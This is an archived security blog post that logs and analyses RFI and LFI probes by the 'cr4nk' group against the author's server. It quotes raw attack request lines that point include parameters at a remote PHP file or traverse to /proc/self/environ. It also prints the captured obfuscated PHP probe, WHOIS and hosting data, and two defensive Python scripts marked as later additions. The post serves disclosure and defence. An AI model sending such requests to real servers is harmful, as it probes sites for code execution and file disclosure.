Blog for hpHosts, and whatever else I feel like writing about ....

Friday 12 September 2008

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang

I've been seeing this in RFI attacks lately, and even documented such on the blog;

http://hphosts.blogspot.com/2008/09/alas-another-exploit-attempt-rfiphp.html

Quite why the blog isn't displaying on IE/Avant properly escapes me, but that's another matter.

I've found this one again in yesterday's server logs (attacker: 195.135.183.134 - mail3.caris.de);

2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0


... and from today's log (attacker: 83.220.144.22 - webbox442.server-home.org);


2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0


... and ....

Attacker: 193.33.20.246 (k10751109.custservers.inetgate.net)
Attacker: 85.214.58.39 (ap2000.de)


2008-09-13 00:36:34 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:34 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:35 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:36 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0

2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:49 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
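As an added example (my own, not code from the original post), the following Python script parses log lines in the layout shown above and tags the three things worth alerting on: a parameter whose value is a remote URL (the RFI probe), a parameter that walks up with ../ towards /proc/self/environ (the LFI probe), and the cr4nk user-agent string. The column order is assumed from the excerpt (date, time, method, URI stem, query, port, user, client IP, user agent, referer, host, status, substatus, win32 status; the excerpt shows only one token in the middle when no user agent was sent, so the parser takes the fixed columns from either end). The first three sample lines are copied from the excerpt; the last is a constructed benign request for contrast.

```python
"""Tag RFI / LFI probes and the cr4nk user agent in IIS-style log lines."""
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample: three lines copied from the post's log excerpt plus one
# benign request (192.0.2.10 is a documentation address, not a real client).
SAMPLE_LOG = """\
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:34 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 01:00:00 GET /index.php page=home 80 - 192.0.2.10 Mozilla/5.0+(constructed) - mysteryfcm.co.uk 200 0 0
"""

_REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)   # value is a remote include target
_TRAVERSAL = re.compile(r"(?:\.\./|\.\.\\)")            # directory walk-up


def parse_line(line):
    """Split one log line into named columns; None if it is too short to be one."""
    parts = line.split()          # IIS encodes spaces inside fields as '+'
    if len(parts) < 12:
        return None
    rec = dict(zip(("date", "time", "method", "stem", "query", "port", "user", "client_ip"),
                   parts[:8]))
    # Between client IP and host sit user agent and referer; the excerpt has one
    # token there when no UA was sent and two when one was, so take both ends fixed.
    middle = parts[8:-4]
    rec["user_agent"] = middle[0] if middle else "-"
    rec["host"], rec["status"], rec["substatus"], rec["win32"] = parts[-4:]
    return rec


def classify(query, user_agent):
    """Return (tag, where) pairs describing why a request looks like a probe."""
    tags = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        v = value.lower()
        if _REMOTE_URL.match(v):
            tags.append(("rfi", key))
        if _TRAVERSAL.search(v):
            tags.append(("lfi-traversal", key))
        if "/proc/self/environ" in v:
            tags.append(("lfi-proc-environ", key))
    if "cr4nk" in user_agent.lower():
        tags.append(("ua-signature", "cr4nk"))
    return tags


def scan(log_text):
    """Return one finding per suspicious line, keeping the status the server answered with."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"], rec["user_agent"])
        if tags:
            hits.append({"client_ip": rec["client_ip"], "stem": rec["stem"],
                         "status": rec["status"], "tags": tags})
    return hits


def attackers(hits):
    """Count findings per source IP, the list you would hand to the abuse desk."""
    return Counter(h["client_ip"] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["client_ip"], h["stem"], h["status"], h["tags"])
    print(attackers(found))
```

The status column is carried through on purpose: in the excerpt the remote-URL probes draw a 404 while the /proc/self/environ probes get a 200, and that difference is what you want to eyeball when deciding whether a script on the box actually honoured the parameter.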


The RFI at the following has been reported to their host and owner;

http://www.jfc.info/jfcinfo/grafiken/i???

... and contains;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.jfc.info/jfcinfo/grafiken/i???
Server IP: 89.238.65.54 [ server1.jfc.info ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 13 September 2008
Time: 09:42:15:42
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


<?php // PHP octal/hex string escapes hide the names: $x0b = "ini_get", $x0c = "strtolower"
$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
// prints "crank_rocks", then "Safemode:on" or "Safemode:off" depending on ini_get("safe_mode"), and exits
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


As documented previously, thanks to the help of the ISC, this exploit attempt seems to indicate that they're trying to determine which servers spit out the "cr4nk rocks" echo (i.e. which ones actually executed the remotely included file), which then indicates the server is vulnerable to attack; the Safemode:on/off line tells them whether PHP's safe_mode is enabled on it as well.
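An added example (mine, not the post's and not the ISC's) for reading payloads of this kind: the script below decodes PHP double-quoted string escapes (\xHH and \OOO octal, plus the named ones), lists every literal in the captured file, and rewrites the variable function calls ($x0b(...)) to the function names they resolve to, so the probe can be read in plain text. The payload text is copied from the vURL capture above; nothing else is assumed.

```python
"""Decode the PHP string-escape obfuscation used in the captured cr4nk probe."""
import re

# Copied from the post's vURL capture of the included file.
PAYLOAD = r'''$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>'''

# PHP double-quoted escapes: \xHH (1-2 hex digits), \OOO (1-3 octal digits),
# a handful of named ones; any other backslash sequence is kept literally.
_NAMED = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b", "f": "\f",
          "\\": "\\", "$": "$", '"': '"'}
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)", re.S)
_DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')


def php_unescape(body):
    """Decode the body of a PHP double-quoted string literal."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8) & 0xFF)   # PHP wraps octal > 0377
        return _NAMED.get(m.group(3), "\\" + m.group(3))
    return _ESCAPE.sub(repl, body)


def php_quote(s):
    """Re-quote a decoded string so the rewritten source is still valid PHP."""
    out = []
    for ch in s:
        if ch in '\\"$':
            out.append("\\" + ch)
        elif 32 <= ord(ch) < 127:
            out.append(ch)
        else:
            out.append("\\x%02x" % ord(ch))
    return '"' + "".join(out) + '"'


def string_literals(src):
    """Every double-quoted literal in the source, decoded, in order of appearance."""
    return [php_unescape(m.group(1)) for m in _DQ_STRING.finditer(src)]


def deobfuscate(src):
    """Decode all literals, then turn $var(...) into a direct call where $var holds a string."""
    plain = _DQ_STRING.sub(lambda m: php_quote(php_unescape(m.group(1))), src)
    for name, body in _ASSIGN.findall(plain):
        func = php_unescape(body)
        plain = re.sub(r"\$" + re.escape(name) + r"\(",
                       lambda _m, f=func: f + "(", plain)
    return plain


if __name__ == "__main__":
    print(string_literals(PAYLOAD))
    print(deobfuscate(PAYLOAD))
```

Run against the capture it yields `$x0b="ini_get"; $x0c="strtolower";` followed by `echo "crank_rocks"; if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") ...`, which is the whole of what the probe does: announce that the include ran and report the safe_mode setting. The same two-step approach (decode literals, then resolve variable calls) handles most of the escape-only obfuscation seen in these RFI test files; it does not evaluate anything.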

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-02-16
Domain Currently Expires: 2009-02-16

Current Nameservers:

dns1.public-dns.net
dns2.public-dns.net
dns3.public-dns.net


Servers IP: 67.225.157.104

OrgName: Liquid Web, Inc.
OrgID: LQWB
Address: 4210 Creyts Rd.
City: Lansing
StateProv: MI
PostalCode: 48917
Country: US

ReferralServer: rwhois://rwhois.liquidweb.com:4321/

NetRange: 67.225.128.0 - 67.225.255.255
CIDR: 67.225.128.0/17
OriginAS: AS32244
NetName: LIQUIDWEB-8
NetHandle: NET-67-225-128-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS.LIQUIDWEB.COM
NameServer: NS1.LIQUIDWEB.COM
Comment:
RegDate: 2007-11-26
Updated: 2008-01-23

OrgAbuseHandle: ABUSE551-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-800-580-4985
OrgAbuseEmail: abuse@liquidweb.com

OrgTechHandle: IPADM47-ARIN
OrgTechName: IP Administrator
OrgTechPhone: +1-800-580-4985
OrgTechEmail: ipadmin@liquidweb.com


Update: Added attacks from today's server logs
Update 2: Added formatting for the code divs to stop them going too long
